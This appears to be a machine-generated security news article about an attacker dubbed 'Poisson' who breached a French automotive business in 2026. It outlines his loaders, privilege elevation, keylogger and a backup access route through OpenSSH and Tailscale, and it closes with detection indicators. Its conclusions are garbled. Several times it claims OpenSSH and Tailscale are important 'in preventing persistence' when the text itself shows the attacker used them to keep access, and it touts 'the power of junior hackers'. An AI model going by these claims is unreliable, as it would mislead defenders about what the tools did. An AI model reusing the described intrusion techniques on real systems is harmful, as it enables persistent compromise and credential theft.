Ethical Hacking News
A recent operation by a junior hacker, known as "Poisson," has highlighted the importance of secure communication protocols in preventing persistence. Poisson installed OpenSSH and Tailscale on a victim's machine before his C2 server went offline, allowing him to maintain access for nearly three weeks. This operation underscores the need for cybersecurity professionals to be vigilant and monitor for unusual activity.
Summary: A junior hacker used OpenSSH and Tailscale to maintain access to a compromised system even after the command-and-control (C2) server went offline. This operation highlights the importance of secure communication protocols and the power of junior hackers.
Poisson, a junior hacker, compromised four machines in April 2026 by installing OpenSSH and Tailscale on a victim's machine. The attack allowed Poisson to maintain access to the system for nearly three weeks after the initial breach. Poisson used various techniques, including VBScript stagers, sandbox-evasion delays, and privilege elevation methods, to bypass security measures. He installed a keylogger that wrote keystrokes to a local file and created a custom-built RustDesk as a backup channel. The attack demonstrated the power of junior hackers and highlighted the importance of secure communication protocols like OpenSSH and Tailscale in preventing persistence. The implications of this operation underscore the need for cybersecurity professionals to monitor for unusual activity, watch for signs of suspicious software installations, and stay vigilant against persistent threats.
The cybersecurity landscape is ever-evolving, with threats emerging from every corner. One such threat that has garnered significant attention recently is that of a junior hacker known as "Poisson." In a recent operation, Poisson managed to install OpenSSH and Tailscale on a victim's machine, building a secure communication layer that bypassed the usual command-and-control (C2) server.
This operation, which took place in April 2026, involved a French-speaking attacker who broke into a small French automotive business. The attacker planted a keylogger and stole banking and email credentials, an ordinary breach but one with significant implications. What makes this operation unique is that Poisson installed OpenSSH and Tailscale on the victim's machine before his C2 server went offline. This allowed him to maintain access to the system for nearly three weeks after the initial breach.
To understand how Poisson achieved this feat, it's essential to delve into the technical details of the attack. According to researchers at Cato Networks, who captured the entire operation command by command, Poisson used a VBScript stager with a sandbox-evasion delay to decrypt a PowerShell loader. This loader then pulled down a .NET loader that ran Havoc's Demon agent without dropping the implant to disk.
Poisson also used Start-Process -Verb RunAs to elevate privileges on one of the victim machines, a method not typically associated with silent UAC bypasses. It took him a dozen tries across two days, however, before he succeeded. After establishing elevation, Poisson set up scheduled tasks running at every logon with highest privileges, injected shellcode into Explorer.exe, and created a custom-built RustDesk as a backup channel.
The keylogger, which was 70 lines of Python code, wrote keystrokes to a local file, but there was no beacon or exfil server. Poisson simply logged in, grabbed the file by hand, and ran powercfg to keep the machines from sleeping, allowing him to harvest data without pause.
In an unusual move, Poisson installed OpenSSH Server and Tailscale on the victim's machine over a five-hour overnight session. He then joined the machine to his private Tailscale network, set up key-based SSH, and established a reverse tunnel. This allowed him to reach the machine over Tailscale's encrypted mesh with no C2 and no exposed ports.
When the Havoc server went offline, Poisson's access did not disappear. Eighteen days later, the C2 returned, and his agents reconnected automatically, without requiring re-compromise. Over the final five days, he ran 145 more commands, probed smart-card and certificate stores, and ran two unexplained executables from a file named Thales.zip for about 32 minutes total.
The implications of this operation are profound, and they highlight several key takeaways for cybersecurity professionals. Firstly, researchers at Cato Networks stress that pulling a C2 server offline is not remediation if the attacker has already built a separate door. This underscores the importance of secure communication protocols like OpenSSH and Tailscale in preventing persistence.
Secondly, this operation demonstrates the power of junior hackers, who are often underestimated due to their inexperience. Poisson's tradecraft was thin, but he still managed to compromise four machines despite failing at roughly half of what he tried.
Lastly, this operation highlights the importance of monitoring for unusual activity and watching for signs of OpenSSH Server installs on Windows workstations, Tailscale.exe on machines that have no reason to run a VPN, reverse tunnels heading to outside hosts, WScript.exe running .vbs files out of user staging folders, scheduled tasks set to the highest privileges launching script interpreters, powercfg standby-timeout changes keeping machines awake, and block DuckDNS.
The answer to what was in Thales.zip and what those two programs did on the machine is left open by Cato, however, it matters more that the C2 was never the intrusion, just one way into it. Killing the C2 server leaves OpenSSH, Tailscale, scheduled tasks, and keyloggers running, allowing the attacker to still maintain access.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Rogue-Persistence-Layer-A-Cautionary-Tale-of-Junior-Hackers-and-Secure-Communication-Protocols-ehn.shtml
https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html
Published: Wed Jun 17 22:20:55 2026 by llama3.2 3B Q4_K_M
